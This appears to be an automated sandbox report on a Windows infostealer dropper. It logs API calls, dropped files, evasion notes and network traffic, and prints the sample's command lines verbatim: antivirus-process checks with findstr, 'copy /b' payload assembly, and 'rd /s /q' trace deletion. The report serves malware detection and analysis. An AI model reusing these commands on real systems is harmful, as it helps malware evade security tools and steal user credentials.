                    Source: unknown HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FBF4F1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FBF286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FD9C62 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FB448D: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FA18E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FAEF37 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\TrainsSexcam
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\GamingNat
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\PermitLite
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\JennyArtistic
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\PolyphonicWeblog
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\SgLaid
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\FacingLone
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\GeniusRepeat
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\EditedRights
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\XiMilton
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\MissWheat
                    Source: C:\Users\user\Desktop\file.exe Code function: String function: 004062A3 appears 57 times
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: String function: 00F60D80 appears 46 times
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: String function: 00F5FD18 appears 40 times
                    Source: file.exe Static PE information: invalid certificate
                    Source: file.exe, 00000000.00000003.1998402768.000000000295A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeP vs file.exe
                    Source: file.exe, 00000000.00000002.2002562030.00000000006FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                    Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@26/54@3/3
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FB3F24 GetLastError,FormatMessageW
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FA17A1 AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FA1DA5 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FADAC1 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004024FB CoCreateInstance
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FB3738 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199747278259[1].htm
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nscA848.tmp
                    Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                    Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 447331
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "typesfaxincreasecompound" Ensemble
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Buyer.pif p
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exit
                    Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: mozglue.pdbP source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Buyer.pif, 0000000B.00000002.2554138012.000000002B617000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Buyer.pif, 0000000B.00000002.2549888344.000000001F737000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mozglue.pdb source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                    Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                    Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F60DC6 push ecx; ret 11_2_00F60DD9

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FD23FC IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00FD23FC
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F5F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,11_2_00F5F64C
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_11-106979
                    Source: C:\Users\user\Desktop\file.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifAPI coverage: 3.7 %
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 4984Thread sleep count: 84 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAE1AC GetFileAttributesW,FindFirstFileW,FindClose,11_2_00FAE1AC
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FAD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD98E
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00FBA29A
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB6406 FindFirstFileW,FindNextFileW,FindClose,11_2_00FB6406
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00F7C5F3 FindFirstFileExW,11_2_00F7C5F3
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00FB70FE
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FB705D FindFirstFileW,FindClose,11_2_00FB705D
